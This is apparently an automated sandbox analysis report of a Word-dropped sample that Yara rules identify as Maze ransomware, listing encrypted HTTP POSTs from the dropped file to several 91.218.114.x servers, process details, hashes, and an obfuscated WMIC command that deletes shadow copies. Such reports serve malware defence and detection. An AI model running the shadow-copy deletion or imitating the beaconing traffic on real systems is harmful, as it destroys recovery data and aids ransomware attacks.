Nov 6, 2019 14:04:48.047976017 CET	779	OUT	POST /edit/signout/r.html HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.38 Content-Type: application/x-www-form-urlencoded Content-Length: 237 Connection: Keep-Alive Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.1.16	49194	91.218.114.38	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:48.479062080 CET	780	OUT	POST /edit/signout/r.html HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.38 Content-Length: 237 Cache-Control: no-cache Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.16	49165	91.218.114.4	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:03:10.555304050 CET	760	OUT	POST /signout/login/ct.html HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.4 Content-Length: 237 Cache-Control: no-cache Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV
Nov 6, 2019 14:03:10.641900063 CET	760	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 06 Nov 2019 13:03:08 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 219 Connection: keep-alive Keep-Alive: timeout=60 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 69 67 6e 6f 75 74 2f 6c 6f 67 69 6e 2f 63 74 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /signout/login/ct.html was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.1.16	49166	91.218.114.11	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:03:10.822678089 CET	761	OUT	POST /forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.11 Content-Type: application/x-www-form-urlencoded Content-Length: 237 Connection: Keep-Alive Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV
Nov 6, 2019 14:03:10.917922020 CET	762	IN	HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2019 13:03:09 GMT Server: Apache/2.4.25 (Debian) Content-Length: 290 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 72 75 6d 2f 67 72 2e 6a 73 70 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 32 31 38 2e 31 31 34 2e 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /forum/gr.jspx was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at 91.218.114.11 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.1.16	49167	91.218.114.25	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:03:11.128880978 CET	763	OUT	POST /frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.25 Content-Type: application/x-www-form-urlencoded Content-Length: 237 Connection: Keep-Alive Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV
Nov 6, 2019 14:03:11.224123001 CET	763	IN	HTTP/1.1 403 Forbidden Server: nginx Content-Type: text/html; charset=utf-8 Content-Length: 148 Date: Wed, 06 Nov 2019 13:03:09 GMT Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.1.16	49168	91.218.114.26	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:03:11.475739956 CET	764	OUT	POST /post/yocs.jspx?mh=gvs58 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.26 Content-Type: application/x-www-form-urlencoded Content-Length: 237 Connection: Keep-Alive Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV
Nov 6, 2019 14:03:11.553497076 CET	765	IN	HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2019 13:03:09 GMT Server: Apache/2.4.10 (Debian) Content-Length: 291 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 6f 73 74 2f 79 6f 63 73 2e 6a 73 70 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 32 31 38 2e 31 31 34 2e 32 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /post/yocs.jspx was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at 91.218.114.26 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.1.16	49181	91.218.114.32	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:16.736845016 CET	769	OUT	POST /checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.32 Content-Type: application/x-www-form-urlencoded Content-Length: 237 Connection: Keep-Alive Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV
Nov 6, 2019 14:04:16.817104101 CET	770	IN	HTTP/1.1 404 Not Found Set-Cookie: TRACKID=a6e79e6caabc112799e2f60bbdb8dc60; Path=/; Version=1 Content-Type: text/html Content-Length: 345 Date: Wed, 06 Nov 2019 13:04:15 GMT Server: Microsoft-HTTPAPI/1.0 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.1.16	49182	91.218.114.37	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:16.980581045 CET	771	OUT	POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.37 Content-Type: application/x-www-form-urlencoded Content-Length: 237 Connection: Keep-Alive Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.1.16	49183	91.218.114.37	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:17.784461975 CET	772	OUT	POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.37 Content-Length: 237 Cache-Control: no-cache Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.1.16	49187	91.218.114.4	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:35.583462954 CET	773	OUT	POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.4 Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: Keep-Alive Data Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3180 Parent PID: 532

General

Start time:	14:02:37
Start date:	06/11/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x2f7b0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wupd12.14.tmp PID: 3780 Parent PID: 3180

General

Start time:	14:02:59
Start date:	06/11/2019
Path:	C:\Windows\Temp\wupd12.14.tmp
Wow64 process (32bit):	false
Commandline:	C:\Windows\Temp\wupd12.14.tmp
Imagebase:	0x400000
File size:	724480 bytes
MD5 hash:	0F841C6332C89EAA7CAC14C9D5B1D35B
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: 00000005.00000003.587220751.00050000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: 00000005.00000003.587200933.00040000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: 00000005.00000003.587056869.023E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: 00000005.00000003.362928581.023E0000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 5%, Metadefender, Browse
Reputation:	low

Chronological Activities

Analysis Process: WINWORD.EXE PID: 2928 Parent PID: 532

General

Start time:	14:03:18
Start date:	06/11/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x2f8e0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 4068 Parent PID: 3780

General

Start time:	14:03:20
Start date:	06/11/2019
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Imagebase:	0xb90000
File size:	395776 bytes
MD5 hash:	A03CF3838775E0801A0894C8BACD2E56
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: notepad.exe PID: 1472 Parent PID: 1440

General

